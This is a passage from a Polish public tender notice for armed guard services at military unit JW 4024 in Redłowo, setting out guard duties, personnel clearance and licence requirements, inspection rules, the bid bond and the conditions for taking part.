1.Zapewnienie pełnej, całodobowej obsady kadrowej posterunków w obiektach chronionych (przy obliczaniu ilości osób należy uwzględnić dane zawarte w tabeli powyżej, zmianowość na posterunkach ze względu na fakt występowania posterunków zewnętrznych, jak również mieć na uwadze nagłe okoliczności, nie dające się przewidzieć, wymagające zmiany pracownika w trakcie trwania służby np. zasłabnięcie, nagła choroba). Sposób naliczenia niezbędnej ilości pracowników ochrony do realizacji przedmiotu zamówienia określa (Instrukcja o ochronie obiektów wojskowych) - OIN 3/2008, § 105.3 
2.Staranne wykonywanie czynności związanych ze świadczeniem usług ochrony oraz wykonywaniem czynności kontrolnych i inspekcyjnych. 
3.Zabezpieczenie i ochronę poszczególnych obiektów przed przedostaniem się na ich teren osób nieupoważnionych, nietrzeźwych lub w sposób widoczny mogących stanowić zagrożenie dla JW 4024.
4.Działania mające na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej pracowników Zamawiającego i innych osób znajdujących się na terenie obiektów.
5.Działania zapobiegające przestępstwom i wykroczeniom przeciwko mieniu, w szczególności przeciwko kradzieżom, włamaniom i innym formom wprowadzenia mienia poza strefę kontrolowaną, przeciwdziałanie powstaniu szkody wynikającej z tych zdarzeń. 
6.Kontrolę dokumentów uprawniających do przebywania na terenie poszczególnych obiektów.
7.Ścisłe przestrzeganie aktualnie obowiązujących decyzji i poleceń, dotyczących funkcjonowania systemu przepustkowego oraz doraźnych ustaleń w tym zakresie.
8.Kontrolę pojazdów wjeżdżających i wyjeżdżających na chroniony teren oraz sprawdzanie dokumentów magazynowych, składników majątkowych wwożonych i wywożonych    z poszczególnych obiektów, zgodnie z trybem i zasadami określonymi w Planie Ochrony, Instrukcją Ochrony.
9.Sprawdzanie po godzinach pracy stanu zabezpieczenia obiektów. 
10.Ochronę obiektu, przed bezprawnym filmowaniem, fotografowaniem, szkicowaniem oraz ewentualnymi aktami sabotażu i terroryzmu;
11.Zabezpieczenie i ochronę kompleksów przed działaniem na jego terenie osób zakłócających ład i porządek publiczny.
12.Zabezpieczenie i ochronę składników majątkowych znajdujących się na terenie obiektów przed kradzieżą rabunkiem zniszczeniem lub uszkodzeniem oraz ujawnianie faktów dewastacji.
13.Reagowanie i natychmiastowe zgłaszanie osobom pełniącym służbę w poszczególnych obiektach wszelkich zauważonych zagrożeń dla mienia oraz zdrowia lub życia osób, przebywających na terenach chronionych.
14.Niezwłoczne powiadamianie bezpośrednich przełożonych, osób pełniących służbę dyżurną  w poszczególnych obiektach o przestępstwach i nadzwyczajnych wydarzeniach zaistniałych na terenie kompleksu oraz podejmowanie niezbędnych czynności, celem zabezpieczenia śladów   i dowodów przestępstwa.
15.Ścisłe współdziałanie w zakresie zapewnienia bezpieczeństwa i ochrony obiektu z Żandarmerią Wojskową, najbliższą jednostką Policji.
16.Kontrola przestrzegania przez pracowników ochrony i innych osób przebywających na terenie chronionego obiektu obowiązujących przepisów porządkowych, ochronnych, przeciwpożarowych oraz ustawy o wychowaniu w trzeźwości.
17.Prowadzenie stałego szkolenia wszystkich pracowników ochrony oraz organizowania ćwiczeń w strzelaniu z broni, będącej na ich wyposażeniu, co najmniej raz na dwa miesiące  i przedstawianie udokumentowania tego faktu. Zasady uzbrojenia i warunki przechowywania i ewidencjonowania broni i amunicji zgodnie z Rozporządzeniem MSWiA z dnia 6 sierpnia 1998r. w sprawie zasad uzbrojenia SUFO i warunków przechowywania i ewidencjonowania broni i amunicji ( Dz. U. z dnia 31.08.1998r) 
18.Udział w kwartalnych szkoleniach z pozorowanym naruszeniem systemu ochrony z całym stanem osobowym jednostki po pisemnych ustaleniach w tym zakresie. 
19.Wykonywanie innych zadań związanych z zapewnieniem na terenie kompleksu bezpieczeństwa, porządku i ochrony mienia zleconych przez upoważnione osoby;
20.Wykonywanie doraźnych poleceń koordynacyjnych Dowódcy JW 4024, Pełnomocnika Ochrony oraz Komendanta Ochrony dotyczących przedmiotu zamówienia;
21.Wykonawca zobowiązuje się do zapewnienia wsparcia przez GRUPĘ INTERWENCYJNĄ  z rygorem czasowym max. 20 minut od chwili ich wezwania przez pracowników Wykonawcy ochraniających poszczególne obiekty. Zamawiający zastrzega sobie możliwość dokonania sprawdzenia czasu stawiennictwa Grupy Interwencyjnej maksymalnie dwa razy w miesiącu ( bez ponoszenia dodatkowych kosztów). 
22.Wykonawca zapewni przeszkolenie pracowników z zasadami posługiwania się technicznymi środkami łączności oraz innym wyposażeniem wykorzystywanym do ochrony poszczególnych obiektów.
23.Zamawiający zapewni przeszkolenie z zakresu posługiwania się technicznymi systemami wspomagającymi ochronę zamontowanymi w poszczególnych obiektach (system SWiN, SKD  i  system TV dozoru) - w terminie określonym w innym trybie. 
24.Wykonawca w sytuacji wprowadzenia stanu nadzwyczajnego lub sytuacji kryzysowej bierze czynny udział w zabezpieczeniu ewakuacji materiałów niejawnych. 
III.   Zagadnienia dotyczące zasad ochrony obiektów 
1.W Instrukcji Ochrony zostaną uszczegółowione zasady ochrony obiektów (trasy patrolowania, procedury postępowania w sytuacjach kryzysowych i nadzwyczajnych, współpraca z wojskowymi służbami ochronnymi, Policją, Żandarmerią Wojskową, zestawienia sił i środków użytych do wykonywania umowy itp.).
2.Instrukcję ochrony wykonuje Wykonawca zgodnie z Rozporządzeniem Ministra Obrony Narodowej z dnia 19 czerwca 1999r. w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów komórek i jednostek organizacyjnych resortu obrony narodowej (Dz. U. Nr 60, poz. 647 z późń. zm.) na podstawie § 6 ust. 4. Do opracowania tego dokumentu wykorzysta materiały otrzymane od Zamawiającego oraz informacje pochodzące ze spotkań roboczych z Zamawiającym. 
3.Zamawiający dostarczy wykaz osób upoważnionych do otwierania pomieszczeń podlegających ochronie oraz niezbędne informacje dla Wykonawcy celem wykonania Instrukcji Ochrony.
4.Po podpisaniu umowy jednakże nie później niż na 2 tygodnie przed rozpoczęciem realizacji umowy Wykonawca przedstawi do zatwierdzenia Zamawiającemu Instrukcję Ochrony.
IV.   Sposób kontrolowania 
1.Wykonawca zobowiązany jest do kontroli osób wchodzących (wychodzących) oraz pojazdów wjeżdżających (wyjeżdżających) na teren i z terenu obiektu na podstawie obowiązującego systemu przepustkowego w jednostkach Marynarki Wojennej . 
2.Uprawnienia Wykonawcy do kontroli dokumentów uprawniających do wstępu, wjazdu  i przebywania na terenie ochranianych obiektów, wnoszenia, wwożenia, wynoszenia lub wywożenia mienia oraz nielegalnego wejścia osób postronnych na tereny i obiekty kompleksu Redłowo  (JW 4024) określone zostaną w Instrukcji Ochrony.
3.Zamawiający udostępni i przekaże protokolarnie Wykonawcy:
- Stacjonarną łączność przewodową i środki łączności bezprzewodowej do powiadamiania i alarmowania oficera dyżurnego jednostki   wojskowej (osoby odpowiedzialnej za ochronę obiektu ) o zaistniałych zdarzeniach (do użytku lokalnego);
- Niezbędne oświetlenie i zabezpieczenie przeciwpożarowe obiektów;
- Pomieszczenia na potrzeby wykonywania zadań ochronnych i pomieszczenia socjalne dla   pracowników ochrony; 
- Wyciągi  z Planu ochrony poszczególnych obiektów zgodnie z rozporządzeniem Ministra Obrony Narodowej z dnia  19 czerwca 1999 r. w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne  terenów komórek i jednostek organizacyjnych resortu obrony narodowej (Dz. U. Nr 60, poz. 647  z późń. zm.).
4.Zamawiający umożliwia pracownikom ochrony korzystanie z systemu zabezpieczenia medycznego w JW. 4024.
V.  Zobowiązania Wykonawcy i Zamawiającego.
1.Zamawiający wymaga, aby Wykonawca zagwarantował stały skład osobowego zespołu pracowników realizujących w imieniu Wykonawcy przedmiot zamówienia. Zamawiający zastrzega sobie prawo zgłaszania wniosków oraz opiniowania zasadności dokonywania zmian w składzie zespołu realizującego przedmiot zamówienia.
2.Wykonawca zobowiązany jest przekazać Pełnomocnikowi  Ochrony Zamawiającego potwierdzone kserokopie: licencji ochrony fizycznej osób i mienia, poświadczeń bezpieczeństwa i zaświadczeń o przeszkoleniu w zakresie ochrony informacji niejawnych wszystkich pracowników realizujących w imieniu Wykonawcy przedmiot zamówienia. 
3.Wykonawca zobowiązuje się przekazać Zamawiającemu pełny wykaz pracowników ochrony z wyszczególnieniem:
   a) pełnionej funkcji
   b) stopnia i numeru licencji pracownika ochrony fizycznej
 c) klauzuli i numeru Poświadczenia bezpieczeństwa osobowego oraz numeru zaświadczenia o przeszkoleniu w zakresie   OIN
4.Wykonawca zobowiązuje się przedłużyć ważność lub uzyskać nowe dokumenty (certyfikaty, zaświadczenia, poświadczenia, koncesje, polisy itp.) potwierdzające zdolność wykonania przedmiotu umowy, w przypadku gdy ich termin ważności upłynie w trakcie trwania umowy. Kserokopie w/w dokumentów zostaną przekazane niezwłocznie Zamawiającemu po przedłużeniu ich ważności lub otrzymaniu nowych.
5.Wykonawca zobowiązuje się z wyprzedzeniem co najmniej 7-dniowym uzgadniać z Zamawiającym wszelkie zmiany osobowe, jakie nastąpią w trakcie trwania niniejszej umowy i uaktualniać wykaz pracowników realizujących przedmiot umowy. 
6.Wykonawca wyraża zgodę na realizację usług ochronnych po ogłoszeniu mobilizacji, wprowadzeniu stanu wojennego lub w czasie wojny na zasadach i w trybie określonym  w Rozporządzeniu Rady Ministrów z dnia 21.05.2002 roku w sprawie militaryzacji jednostek organizacyjnych wykonujących zadania na rzecz obronności lub bezpieczeństwa Państwa ( Dz. U. nr 78 poz. 707), Rozporządzeniu Ministra Obrony Narodowej z dnia 19.06.1999 roku w sprawie ochrony przez specjalistyczne uzbrojone formacje ochronne terenów , komórek i jednostek organizacyjnych Resortu Obrony Narodowej (Dz. U. nr 60, poz. 647 zm. Dz. U. z 2006 r., nr 19 poz. 148) oraz rozporządzeniu Ministra Obrony Narodowej z dnia 2.06.1999 roku w sprawie wewnętrznych służb ochrony działających na terenach komórek i jednostek organizacyjnych Resortu Obrony Narodowej (dz. U. nr 58 poz. 619 zm. Dz. U. z 2006 roku nr 19 poz. 147).
 Zamawiający przewiduje po wprowadzeniu stanu wojennego lub w czasie wojny w trybie szczegółowo uzgodnionym z Wykonawcą  przekazanie ochrony obiektów I i II  warcie wojskowej Zamawiającego.
7.  Pracownicy ochrony fizycznej przewidziani do ochrony obiektów wojskowych nie mogą posiadać statusu osób   niepełnosprawnych i muszą posiadać kwalifikacje do wykonania przedmiotu umowy oraz dodatkowo:
1) licencję pracownika ochrony fizycznej
a) II stopnia
- osoba koordynująca pracę pracowników ochrony na posterunkach zewnętrznych w Obiekcie I 
-  osoby pełniące służbę w pomieszczeniu biura przepustek w Obiekcie II 
-   koordynator ochrony SUFO z ramienia Wykonawcy
  b) I  stopnia  - pozostali pracownicy. 
  2) poświadczenie bezpieczeństwa osobowego, upoważniające do dostępu do informacji niejawnych i tak :
   -   zastrzeżone dla pracowników ochrony, 
   -  poufne dla koordynatora ochrony SUFO z ramienia Wykonawcy.
8. Wykonawca zobowiązuje się do jednolitego umundurowania pracowników ochrony w następujący sposób:
-  umundurowanie służbowe z oznakami przynależności do SUFO oraz z identyfikatorami  osobowymi;
-  umundurowanie, uzbrojenie i wyposażenie pracowników SUFO musi być zgodne  z  obowiązującymi przepisami;
-  Wykonawca zobowiązuje się wyposażyć pracowników ochrony w broń palną bojową  wraz z    amunicją, niezbędne środki przymusu    bezpośredniego oraz inne wyposażenie konieczne do wykonywania usług z zakresu ochrony,  zgodnie z wymogami zawartymi w powyższej tabeli
9  Wykonawca odpowiada w pełnej wysokości za straty poniesione przez Zamawiającego wynikłe z nienależytego wykonania warunków umowy.
10. Wysokość strat każdorazowo ustalana jest na podstawie protokołu sporządzanego na tę okoliczność i podpisanego przez upoważnionych przedstawicieli stron.
 VI.  Zasady podległości pracowników ochrony:
1.Pracownicy ochrony podlegają bezpośrednio Wykonawcy, który wydaje im polecenia i sprawuje dyscyplinarny nadzór i kierownictwo nad zatrudnionymi przez siebie pracownikami.
2.Pracownicy Wykonawcy pod względem wykonywania obowiązków związanych z ochroną obiektów, terenów i urządzeń na terenie kompleksu podlegają bezpośrednio:
-  Wykonawcy;
- Dowódcy zmiany (w stosunku do pracownikach pełniących służbę na posterunkach obchodowych  obiektu I  oraz    pracownikowi biura przepustek w odniesieniu do pracowników  posterunków obchodowych w obiekcie II);
3.Oficerowi dyżurnemu oddziału, jego pomocnikowi (w stosunku do wszystkich obiektów) i pomocnikowi oficera dyżurnego oddziału w pionie wsparcia,(w stosunku do pracowników obiektu II i III) oraz oficerowi dyżurnemu DMW    i Kierownikowi Sekcji Zabezpieczenia ( w stosunku do pracowników ochrony obiektu IV ). 
 VII.  Ochrona informacji niejawnych.
1.Strony  zobowiązują się do przechowywania niniejszej umowy oraz korespondencji dotyczącej przedmiotu zamówienia , jako dokumentów ograniczonej dostępności i nie rozpowszechniania wiadomości o ich treści, w myśl obowiązujących przepisów - Ustawa z dnia 22.01.1999 r. o ochronie informacji niejawnych Dz. U. Nr 11, poz. 95) oraz zgodnie z Instrukcją Bezpieczeństwa.
2.Wykonawca w zakresie zapewnienia ochrony informacji zobowiązany jest do nie ujawniania informacji o zakresie prac, miejscu wykonywania umowy, uzyskanych informacjach szczególnie dotyczących systemu ochrony poszczególnych obiektów oraz ścisłego przestrzegania przepisów o ochronie informacji niejawnych.
VIII.   Zakres i sposób kontroli wykonywania zadań ochrony terenów, obiektów, urządzeń JW 4024   w poszczególnych obiektach przez pracowników SUFO prowadzany przez przełożonych oraz osoby określone w odrębnych przepisach, posiadające uprawnienia do kontroli stanu ochrony JW 4024:
1.Pełnomocnik Ochrony oraz Komendant Ochrony oraz osoby wymienione w pkt VI  ppkt. 3 mają prawo kontroli pracowników ochrony o każdej porze dnia i nocy. Wszystkie uwagi dotyczące wykonywania usług z zakresu ochrony będą przekazywane Wykonawcy, który będzie zobowiązany do ich natychmiastowego usunięcia. W przypadku rażącego lub powtarzającego się zaniedbywania obowiązków przez Wykonawcę, Zamawiający uprawniony będzie do odstąpienia od umowy;
2.Za zgodą Dowódcy JW 4024 kontrolę może przeprowadzać organ Żandarmerii Wojskowej oraz inne osoby posiadające uprawnienia do kontroli stanu ochrony terenów, obiektów i urządzeń wojskowych. Kontrolę przeprowadza się w obecności Pełnomocnika Ochrony, Komendanta Ochrony JW 4024;
3.Ogólny zakres kontroli:
- Sposób wykonywania obowiązków przez pracowników Wykonawcy wynikający z realizacji niniejszej umowy, Planu   Ochrony,  Instrukcji Ochrony i innych dokumentów normatywnych;
- Stan wyposażenia pomieszczeń przekazanych Wykonawcy;
- Stan dokumentacji oraz sposób jej prowadzenia;
- Trzeźwość pracowników;
- Zasady przechowywania broni i amunicji;
- Wyposażenie pracowników Wykonawcy;
- Sprawność technicznych systemów wspomagających ochronę oraz środków łączności;
4.Kontrole będą dokonywane w miejscu pełnienia służby, w rejonach posterunków (na trasach patrolowania) kontrole dokonuje się w obecności pracownika ochrony koordynującego tok pełnienia pracy.
5.W siedzibie Wykonawcy osoby wymienione w pkt VIII ppkt. 1 i 2  mają prawo do kontroli:
- Przestrzeganie przepisów dotyczących ochrony informacji niejawnych;
- Dokumentację związana z prowadzeniem przez Wykonawcę szkoleń dla pracowników;
- Aktualności poświadczeń bezpieczeństwo osobowego pracowników Wykonawcy realizujących umowę.
6.Szczegółowe uprawnienia osób funkcyjnych jednostki wojskowej oraz służb dyżurnych w stosunku do pracowników zostaną określone w Instrukcji Ochrony.
7.Osobą upoważnioną do współpracy z Wykonawcą w związku z wykonywaniem usług z zakresu ochrony ze strony Zamawiającego jest Pełnomocnik Ochrony oraz Komendant Ochrony JW 4024 lub inna osoba wyznaczona przez Dowódcę JW 4024.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest zobowiązany do wniesienia wadium przed upływem terminu składania ofert 
w wysokości: 45 000,00 zł.-  kserokopie wpłaty wadium dołączyć do oferty.     
2.	Wadium może być wniesione w:
- Pieniądzu;	
      - poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
- gwarancjach bankowych.
- gwarancjach ubezpieczeniowych;
      - poręczeniach udzielanych przez podmioty , o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 z późn. zm). 
	Oryginał dokumentu należy złożyć w oddzielnej kopercie, a jego kopie dołączyć do oferty.
3.	Wadium wnoszone w formie pieniężnej należy wnieść przelewem na konto w banku:
Bank PEKAO SA V/O Gdynia  nr konta 39 1240 2933 1111 0010 1598 5171  z dopiskiem Wadium na PN - 124/ POIN/SUFO/JW4024/2010; 
4.   Z treściu gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust. 5 ustawy Pzp. 
5.      Zamawiający dokona niezwłocznie zwrotu wadium jeżeli zajdą przesłanki określone w art. 46 ust. 1, 1a i 2 ustawy Pzp.
6.   Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniężny na rachunek bankowy wskazany przez Wykonawcę. Okoliczności i zasady zwrotu wadium, jego przepadku oraz określa ustawa Pzp. 
7.    Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada aktualną koncesję MSWiA na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia wydaną na podstawie ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia (tj. Dz. U. z 2005 r. Nr 145 poz. 1221 z późń. zm.)
Zamawiający w toku sprawdzania ofert dokona oceny spełnienia  przez wykonawców warunków udziału w postępowaniu wg kryterium spełnia / nie spełnia, kolejno dla każdego z wymaganych warunków, oraz zgodności z treścią SIWZ. Zamawiający dokona ww. czynności wyłącznie na podstawie analizy złożonej oferty wraz z wymaganymi oświadczeniami i dokumentami, z zastrzeżeniem treści art. 26 ust 3 ustawy Pzp.
Przez ocenę dokumentów należy rozumieć ich badanie w zakresie ustalonym przez prawo, tj. przeprowadzenie analizy w kontekście: czy dany dokument został wystawiony przez podmiot lub organ uprawniony do jego wystawienia, czy dokument został wystawiony w okresie ustalonym przez prawo (nie później niż), czy zawiera on informacje wymagane dla tego dokumentu, czy adresatem tego dokumentu jest wykonawca uczestniczący w przedmiotowym postępowaniu, czy kserokopia załączona przez wykonawców w miejscu oryginału została potwierdzona za zgodność przez osoby uprawnione.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca wykaże,że wykonywał lub wykonuje (przez okres co najmniej 6 miesięcy)  w okresie ostatnich  3 lat przed dniem  wszczęcia postępowania, minimum 2 usług w zakresie ochrony osób i mienia (podobnych, przedmiotowo zbieżnych z przedmiotem zamówienia z podaniem ich wartości minimum 300 000,00 zł - każda ), zawierających datę wykonania, dane zamawiającego  oraz załączenie dokumentów potwierdzających, że usługa została wykonana należycie. 
Zamawiający w toku sprawdzania ofert dokona oceny spełnienia  przez wykonawców warunków udziału w postępowaniu wg kryterium spełnia / nie spełnia, kolejno dla każdego z wymaganych warunków, oraz zgodności z treścią SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje pracownikami ochrony planowanymi  do realizacji przedmiotu umowy oraz osobami nadzorującymi i kontrolującymi z ramienia Wykonawcy, którzy posiadają poświadczenia bezpieczeństwa o klauzuli wskazanej w SIWZ,  licencje i pozwolenia na posiadanie broni palnej, w ilości zapewniającej należyte wykonanie przedmiotu zamówienia, wyposażenie w broń palną bojową, środki łączności bezprzewodowej i inne wyposażenie potrzebne do realizacji zamówienia. 
Zamawiający w toku sprawdzania ofert dokona oceny spełnienia  przez wykonawców warunków udziału w postępowaniu wg kryterium spełnia / nie spełnia, kolejno dla każdego z wymaganych warunków, oraz zgodności z treścią SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykaz personelu przewidzianego do realizacji zlecenia wykonany zgodnie z postanowieniami zawartymi w szczegółowym opisie przedmiotu zamówienia z podaniem funkcji, danych dotyczących poświadczenia bezpieczeństwa osobowego -  (numer, klauzula, data ważności), zaświadczenia o przeszkoleniu w zakresie OIN, danych dotyczących licencji pracownika ochrony fizycznej - numer i stopień licencji
2. Wykaże, że posiada Kancelarię Tajną, stanowisko komputerowe uprawnione zgodnie z przepisami OIN o klauzuli zastrzeżone lub wyższej oraz zatrudnieniu  przez Wykonawcę Pełnomocnika ds. Ochrony Informacji Niejawnych 
3. Wykażę, że   posiada Grupe Interwencyjną
Zamawiający w toku sprawdzania ofert dokona oceny spełnienia  przez wykonawców warunków udziału w postępowaniu wg kryterium spełnia / nie spełnia, kolejno dla każdego z wymaganych warunków, oraz zgodności z treścią SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaże,że posiada polise, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od   odpowiedzialności cywilnej w zakresie prowadzonej działalności, suma ubezpieczenia nie niższa niż: 500 000,00 zł
Zamawiający w toku sprawdzania ofert dokona oceny spełnienia  przez wykonawców warunków udziału w postępowaniu wg kryterium spełnia / nie spełnia, kolejno dla każdego z wymaganych warunków, oraz zgodności z treścią SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
